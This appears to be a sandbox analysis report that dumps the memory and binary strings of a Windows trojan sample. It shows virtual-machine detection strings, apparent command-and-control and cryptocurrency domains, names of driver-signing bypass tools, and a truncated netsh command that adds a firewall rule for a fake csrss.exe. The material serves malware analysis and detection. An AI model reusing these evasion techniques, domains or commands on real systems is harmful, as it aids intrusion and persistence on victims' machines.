Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: csrss.exe Binary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
Source: csrss.exe Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: csrss.exe Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: xennetxennet6XA
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vboxservice.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vboxtray.exe
Source: csrss.exe Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesv
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327572896.00000000160C4000.00000004.00000001.sdmp Binary or memory string: Microsoft Windows 10 ProHKEY_USERS\ardz\Desktop\4t4y4r89UZ.exe" "C:\Users\user\Desktop\4t4y4r89UZ.exe" S-1-5-21-3853321935-2125563209-4053062332-1002RoughSnowFirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\4t4y4r89uz.exeintel(r) core(tm)2 cpu 6600 @ 2.40 ghzcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeMicrosoft Windows 10 ProC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrssaa3f8HKEY_USERS\S-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmhgfs$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp Binary or memory string: ?advapi32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime3LFU_3R1OpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmk
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exewinlogon.exesharedintapp.exeservices.exesharedintapp.exelsass.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exesvchost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exe4t4y4r89uz.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: [system process]vboxtray.exe
Source: csrss.exe Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vmxnetvmx86$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: systemvmsrvc.exe
Source: csrss.exe Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
